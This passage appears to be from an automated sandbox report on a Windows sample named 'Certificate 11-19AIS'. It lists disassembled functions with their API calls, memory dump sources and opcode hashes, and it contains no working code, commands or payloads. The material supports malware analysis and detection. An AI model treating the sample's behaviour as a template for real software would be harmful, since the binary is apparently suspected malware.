                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: 564f006a10ed801c282094997eeaa9761408a1148754be57c69bf5d5f73ef252
                                                                              • Instruction ID: 934267966cb770af8c86e44429b57a7646a4697ab93994864ba89da6ef9e81fb
                                                                              • Opcode Fuzzy Hash: 564f006a10ed801c282094997eeaa9761408a1148754be57c69bf5d5f73ef252
                                                                              • Instruction Fuzzy Hash: 07216672A001249FC7219F69DC99A9EBBECFF89350F00456AF849D7291DB7499418F90
                                                                              Function 007F0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007F1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?), ref: 007F1E77
                                                                                • Part of subcall function 007F1E68: lstrcpyW.KERNEL32(00000000,?,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F1E9D
                                                                                • Part of subcall function 007F1E68: lstrcmpiW.KERNEL32(00000000,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?), ref: 007F1ECE
                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0AD4
                                                                              • lstrcpyW.KERNEL32(00000000,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0AFA
                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0B2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                              • String ID: cdecl
                                                                              • API String ID: 4031866154-3896280584
                                                                              • Opcode ID: 72eff79c8bc3575232778eaca97e905a18ce8551d32858827dd10f4b68835f7d
                                                                              • Instruction ID: 6098357fe1759112df80168805a1385c38ff96355d409f4478e4651f847afb10
                                                                              • Opcode Fuzzy Hash: 72eff79c8bc3575232778eaca97e905a18ce8551d32858827dd10f4b68835f7d
                                                                              • Instruction Fuzzy Hash: 9411BE76200309EFDB25AF34DC09E7A77A9FF45310B80406AEA06CB391EB759850C7E0
                                                                              Function 007E2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 007E2FB5
                                                                                • Part of subcall function 007D395C: __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                                                • Part of subcall function 007D395C: __NMSG_WRITE.LIBCMT ref: 007D397A
                                                                                • Part of subcall function 007D395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: 0f92248d7609c060e732a33478dbd8b8d9264a556043bb586db70d11517911a1
                                                                              • Instruction ID: e8df54f9e03921d15f13e6b222a84223f0f528cda6a6a8bc3c9965f4eb70820a
                                                                              • Opcode Fuzzy Hash: 0f92248d7609c060e732a33478dbd8b8d9264a556043bb586db70d11517911a1
                                                                              • Instruction Fuzzy Hash: 3811EB3140A251EFDB213B71AC0D6593BACAF483A4F204C16F80D9A252EA3CCD40CAA0
                                                                              Function 007F058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007F05AC
                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007F05C7
                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007F05DD
                                                                              • FreeLibrary.KERNEL32(?), ref: 007F0632
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                              • String ID:
                                                                              • API String ID: 3137044355-0
                                                                              • Opcode ID: 1595b4cd06ff7446c962cefbf9ade6167f7240bfb101a82c9f503b201dc65e5a
                                                                              • Instruction ID: f7e10d5a56a11f2ac5c7c67f76931de75488aa8f2777d926ffaa60652cc8fb3c
                                                                              • Opcode Fuzzy Hash: 1595b4cd06ff7446c962cefbf9ade6167f7240bfb101a82c9f503b201dc65e5a
                                                                              • Instruction Fuzzy Hash: C221517190020DEBDB208F91DC88AEAB7B8EF40700F108469E616D2351D774EA559B91
                                                                              Function 007F6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007F6733
                                                                              • _memset.LIBCMT ref: 007F6754
                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007F67A6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 007F67AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                              • String ID:
                                                                              • API String ID: 1157408455-0
                                                                              • Opcode ID: f446c1ad9aadb8cf88ceff2b05909be290ab7f3195175bbb6cacd103cde69266
                                                                              • Instruction ID: 80ea37738fe7f266d27df6709b5b1847820bb5a5b12ae50dbf42520bfdb59bcc
                                                                              • Opcode Fuzzy Hash: f446c1ad9aadb8cf88ceff2b05909be290ab7f3195175bbb6cacd103cde69266
                                                                              • Instruction Fuzzy Hash: 9B110A72901228BAE72067A5AC4DFAFBABCEF44724F10459AF504E72C0D2745E808BB4
                                                                              Function 007EB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007EAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007EAA79
                                                                                • Part of subcall function 007EAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007EAA83
                                                                                • Part of subcall function 007EAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007EAA92
                                                                                • Part of subcall function 007EAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007EAA99
                                                                                • Part of subcall function 007EAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007EAAAF
                                                                              • GetLengthSid.ADVAPI32(?,00000000,007EADE4,?,?), ref: 007EB21B
                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007EB227
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007EB22E
                                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 007EB247
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                              • String ID:
                                                                              • API String ID: 4217664535-0
                                                                              • Opcode ID: 5aebab0c24794800907081fc6cda33447152a38b6921af4cc5aa8bedf91701a7
                                                                              • Instruction ID: dc3682603c3651310199203bb75fdfa9c3e5c852058858892e90daeb0ed3330f
                                                                              • Opcode Fuzzy Hash: 5aebab0c24794800907081fc6cda33447152a38b6921af4cc5aa8bedf91701a7
                                                                              • Instruction Fuzzy Hash: CC119171A02205FFDB049FA5DD95AAFBBADFF89304F14842DEA4297210D739AE44DB10
                                                                              Function 007EB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 007EB498
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4AA
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4C0
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 2fa3a3b99a886fba577e1a90cbbfb57f4a4d8cd623b3cf2cd3fb60a3024b7428
                                                                              • Instruction ID: 69fc412dbc3374113d6bae958c5623e35f5e36118f405dd1188117405e9f689e
                                                                              • Opcode Fuzzy Hash: 2fa3a3b99a886fba577e1a90cbbfb57f4a4d8cd623b3cf2cd3fb60a3024b7428
                                                                              • Instruction Fuzzy Hash: 74115A7A901258FFEB11DFA9C885E9EBBB4FB09700F204091E604BB290D771AE10DB94
                                                                              Function 007CB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 007CB5A5
                                                                              • GetClientRect.USER32(?,?), ref: 0082E69A
                                                                              • GetCursorPos.USER32(?), ref: 0082E6A4
                                                                              • ScreenToClient.USER32(?,?), ref: 0082E6AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: 910fdf86191054b071df2cc213c561c1241028dc7ed97446c9294439e635141d
                                                                              • Instruction ID: 4da75cc1e2815872e3a2a6c209d2b6cbde1474730e27ba34cc81858d856536b0
                                                                              • Opcode Fuzzy Hash: 910fdf86191054b071df2cc213c561c1241028dc7ed97446c9294439e635141d
                                                                              • Instruction Fuzzy Hash: AD110A31900129FBCB10DFA8EC4ADEE77B9FB59305F100859F911E7140D734AA96CBA5
                                                                              Function 007F732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007F7352
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 007F7385
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007F739B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007F73A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: d36bcdac4d5c2a69aad1652aa083882a2fa58c074dbe5a93dc00b490003fa560
                                                                              • Instruction ID: e244ef938480c0aa2dda53fd526d9026069d0d935997b9fea6e36358eb687899
                                                                              • Opcode Fuzzy Hash: d36bcdac4d5c2a69aad1652aa083882a2fa58c074dbe5a93dc00b490003fa560
                                                                              • Instruction Fuzzy Hash: FE114472A04249BFC7019BACEC09AAE7BADBF84311F104315F925D33A6D274CD0097A1
                                                                              Function 007CD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                              • GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                              • String ID:
                                                                              • API String ID: 3970641297-0
                                                                              • Opcode ID: 390056c8109a0fa597ccb52fe7340d0076e2c10d21d71bbde20f9c25d28a3b68
                                                                              • Instruction ID: 87572072b070b479fcfef2828cc5656334ce3bbe43e000bbd668e4b5e7c62b00
                                                                              • Opcode Fuzzy Hash: 390056c8109a0fa597ccb52fe7340d0076e2c10d21d71bbde20f9c25d28a3b68
                                                                              • Instruction Fuzzy Hash: 0C11C0B210160DBFEF224FA4EC55EEABB6AFF59364F090129FA1452150C735DC60DBA0
                                                                              Function 007E4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                              • Instruction ID: 25268f7bd50c852e785c688e03b5d891f5b288d10dc94b872c309cb05e2bce95
                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                              • Instruction Fuzzy Hash: 14014B3600118EFBCF125E95DC068EE3F23BB1C354B588455FA2859031D33ACAB1AB81
                                                                              Function 007D7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007D7A0D: __getptd_noexit.LIBCMT ref: 007D7A0E
                                                                              • __lock.LIBCMT ref: 007D748F
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 007D74AC
                                                                              • _free.LIBCMT ref: 007D74BF
                                                                              • InterlockedIncrement.KERNEL32(00CF1F60), ref: 007D74D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                              • String ID:
                                                                              • API String ID: 2704283638-0
                                                                              • Opcode ID: 842471e9ae68a206e087e36370c488f19aa931504e1249d91754a9d940907fac
                                                                              • Instruction ID: 957ec165abdd1a3cce1e1a299b3c23445f9a81fef271f035299746c9df8a775d
                                                                              • Opcode Fuzzy Hash: 842471e9ae68a206e087e36370c488f19aa931504e1249d91754a9d940907fac
                                                                              • Instruction Fuzzy Hash: 1701AD3290A661EBCB1BAF64A50A75DBB70BB04710F16400BF814B7780EB2C6900CFD2
                                                                              Function 007D7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 007D7AD8
                                                                                • Part of subcall function 007D7CF4: __mtinitlocknum.LIBCMT ref: 007D7D06
                                                                                • Part of subcall function 007D7CF4: EnterCriticalSection.KERNEL32(00000000,?,007D7ADD,0000000D), ref: 007D7D1F
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 007D7AE5
                                                                              • __lock.LIBCMT ref: 007D7AF9
                                                                              • ___addlocaleref.LIBCMT ref: 007D7B17
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1687444384-0
                                                                              • Opcode ID: 9ec727c9601313daeaa18548bbb920d32eee6807b79597eb74415f35a6bd70b4
                                                                              • Instruction ID: 6eb74a424bd1fc7de145f91f77543af5ec3e5adba68e213a55e2875cf9d20afa
                                                                              • Opcode Fuzzy Hash: 9ec727c9601313daeaa18548bbb920d32eee6807b79597eb74415f35a6bd70b4
                                                                              • Instruction Fuzzy Hash: DA015B71405B00DED7209F75D90A74AB7F0FF50321F20890FE49A967A0DBB8A644CB51
                                                                              Function 0081E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0081E33D
                                                                              • _memset.LIBCMT ref: 0081E34C
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00873D00,00873D44), ref: 0081E37B
                                                                              • CloseHandle.KERNEL32 ref: 0081E38D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID:
                                                                              • API String ID: 3277943733-0
                                                                              • Opcode ID: aefb04c4e37df8c71d9ef470e3a22eaecd64efc092f366b60877e62cc51052ee
                                                                              • Instruction ID: 5db8b614da5b17a76dcfb49f093f3ef5ccdd407d3243b46375129cefcfc244ea
                                                                              • Opcode Fuzzy Hash: aefb04c4e37df8c71d9ef470e3a22eaecd64efc092f366b60877e62cc51052ee
                                                                              • Instruction Fuzzy Hash: C1F05EF1640314BAE2201BA0AC4DF7B7E6CFB05754F004422BF0CE62A6D375DE40A6AA
                                                                              Function 0081EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                                                • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                                                • Part of subcall function 007CAF83: BeginPath.GDI32(?), ref: 007CB009
                                                                                • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CB033
                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0081EA8E
                                                                              • LineTo.GDI32(00000000,?,?), ref: 0081EA9B
                                                                              • EndPath.GDI32(00000000), ref: 0081EAAB
                                                                              • StrokePath.GDI32(00000000), ref: 0081EAB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 1539411459-0
                                                                              • Opcode ID: b1060f702e9796fc32886638c6beb12f6ba83b0c14e037114971ee14d1264c99
                                                                              • Instruction ID: 932a97ec6e498e4f285dbacd7a4b43723bce1fda804c1a35ba574a3c044f76bb
                                                                              • Opcode Fuzzy Hash: b1060f702e9796fc32886638c6beb12f6ba83b0c14e037114971ee14d1264c99
                                                                              • Instruction Fuzzy Hash: 67F05E31045669BBDF129FA4AC0DFCE3F29BF56711F044105FE11610F187B49595CB95
                                                                              Function 007EC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                              Download Yara Rule
